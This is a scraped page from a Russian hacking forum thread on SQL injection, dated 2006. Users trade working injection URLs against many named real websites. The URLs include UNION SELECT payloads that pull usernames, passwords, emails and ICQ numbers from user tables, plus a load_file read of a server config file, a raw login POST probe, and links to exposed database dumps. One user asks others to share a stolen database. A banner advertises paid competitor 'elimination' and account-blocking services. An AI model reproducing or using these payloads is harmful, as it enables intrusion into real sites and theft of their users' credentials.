SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
SQL Инъекции

Страница 4 из 1604

Опции темы

Поиск в этой теме

Опции просмотра

#31

05.08.2006, 02:32

atall v.5

Новичок

Регистрация: 09.07.2006

Сообщений: 1

С нами: 10441674

Репутация: 1

epidem.ru

http://epidem.ru/modules.php?name=News&pagenum=\'

#32

05.08.2006, 02:50

podkashey

Познавший АНТИЧАТ

Регистрация: 18.06.2005

Сообщений: 1,004

С нами: 10997666

Репутация: 1320

Цитата:

http://epidem.ru/modules.php?name=News&pagenum=\'

server version for the right syntax to use near '-10, 10' at line 1
ИМХО скуль в LIMIT находится, смысла поэтому в нем не много.

Для тех кто хочет покопаться в Postgresql:
http://club.veresk.ru/?part_id=18-1%20union%20select%20version()

#33

10.08.2006, 15:19

LordNet

Познающий

Регистрация: 07.02.2006

Сообщений: 33

С нами: 10661349

Репутация: 24

Вот нашел:
http://www.britishcat.ru/articles.html?Action=ShowArticle&Article=8-1+union+select+111,222,333,444,555/*

После 20 мин получилось вот такое )) :

Код:

http://www.britishcat.ru/articles.html?Action=ShowArticle&Article=8-1+union+select+111,222,333,444,CONCAT('ID=',id,'%20Login=',Login,'%20Passord=',password,'%20Mail=',%20email,'%20ICQ=',icq)+from+users/*

Может, кто захочет дальше поковырять.

Последний раз редактировалось kot777; 11.08.2006 в 11:32..

#34

11.08.2006, 13:17

Dagon

Познающий

Регистрация: 27.03.2006

Сообщений: 86

С нами: 10591280

Репутация: 52

sql иньекция в сбербанке )

http://www.vsb.vrn.ru/vbank/branches.asp?bk=1%20UNION%20SSS

#35

13.08.2006, 19:04

Go0o$E

Members of Antichat - Level 5

Регистрация: 27.01.2006

Сообщений: 258

С нами: 10676486

Репутация: 774

Sql на www.territory.ru

POST http://www.territory.ru/info/news/index.php?show=cat&id=0 HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.territory.ru
Content-Length: 57
Connection: Close
Pragma: no-cache

show=login&login='&password=123email@123.com

2 Tem
Если сможешь тут слить базу, ОЧЕНЬ буду признателен, если скинешь ее и мне. 8)

__________________

Завтра будет.Лучше.

#36

17.08.2006, 10:10

w00lf

Новичок

Регистрация: 03.07.2006

Сообщений: 17

С нами: 10449971

Репутация: 3

https://secure.mysociety.org/ cvstrac/getfile/mysociety/twfy/db/users.sql

home.southernct.edu/~dorrt1/work/lablog/admins.sql

members.home.nl/j.fridzema/database.sql

#37

18.08.2006, 20:59

Azazel

Заведующий всем

Регистрация: 17.04.2005

Сообщений: 1,062

С нами: 11087066

Репутация: 561

Вот, поднакопилось.

Код:

http://www.4webhelp.net/tutorials/?cid=9%20union%20select%201,2,user_password,4,5,6%20from%20users/*
http://www.ipworld.only.pl/portal/articles.php?topic=-18%20union%20select%20111,pass,333,444,555%20from%20users/*-
http://www.gamersinfo.net/content/news.php?id=-168%20union%20select%20111,username,password,email,555,666,777,888,999%20from%20user/*-
http://www.dailynews-tsn.com/news.php?id=2163'%20union%20select%201,2,3,4,5,6,7,8,9,load_file('/home2/tsnweb/dailynews-tsn-www/db_fns.php'),1,2,3,4,5,6,7,8,9%20from%20tsn_members/*-
http://www.dynamomania.com/news.php?p=message&id=-20242%20union%20select%201,2,email,pwd,5,6%20from%20users%20limit%203,4/*
http://www.foodheart.org/news/news.php?id=55555555555%20union%20select%201,username,3,password,5,6,7,8,9%20from%20users/*-
http://staging.aiap.it/news.php?ID=-754%20union%20select%201,2,3,4,5,6,7,8/*-
http://webpagemaintenance.com/article.php?id=444444444444444%20union%20select%20111,222/*-
http://www.nasar.org/nasar/news.php?id=6666666666666%20union%20select%201,2,email,password%20from%20users/*-
http://www.hispanicprwire.com/news.php?l=in&id=-640%20union%20select%201,2,3,4,5,6/*
http://www.losingtoday.com/news.php?id=-1475%20union%20select%201,2,3,4,5,6,7,8,9,0/*
http://www.agh.edu.pl/news.php?id=-389%20union%20select%201,2,3,4,5,6,7,8,9,0,1,2,3,4,5/*
http://www.reusablebags.com/news.php?id=-17%20union%20select%201,email,3,4,5,6,7,8,9%20from%20orders/*
http://www.statistica.md/news.php?lang=ru&id=12666666666%20union%20select%201,2,3,4,5,6,7,8,9,0,1/*
http://kmi4schools.e2bn.net/rostra/news.php?r=1&t=2&id=555555555%20union%20select%201,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,0,1,2,3%20from%20account/*
http://fat-cat.co.uk/fatcat/news.php?id=44444444444%20union%20select%201,22,33,4,5,6,7,8,9,0,1,2/*

__________________
Full DNS report

#38

20.08.2006, 22:39

gibson

Постоянный

Регистрация: 24.02.2006

Сообщений: 447

С нами: 10636106

Репутация: 705

вот еще одна
http://albatros.uz/index.php?option=content&task=view&id=6&Itemid=30'

#39

25.08.2006, 23:54

1SeTh

Участник форума

Регистрация: 17.02.2006

Сообщений: 189

С нами: 10646246

Репутация: 34

а вот на wap.wab.ru
при отправке письма выдает:
Ошибка при отправке письма! Попробуйте еще раз.
ERROR You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'Юзернейм')and(idtowhom = '515488')and(topic = ''') limit 1' at lin

#40

17.09.2006, 10:45

aleks28

Новичок

Регистрация: 16.09.2006

Сообщений: 9

С нами: 10341949

Репутация: 9

Вот нашел только вот толку маловато наверно, так как я не могу найти таблицу users
_http://www.yuretz.ru/prikol.php?id=470+union+select+0,1,2,3,4,5,6,7,8,9 ,10,11/*

Страница 4 из 1604

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)

Быстрый переход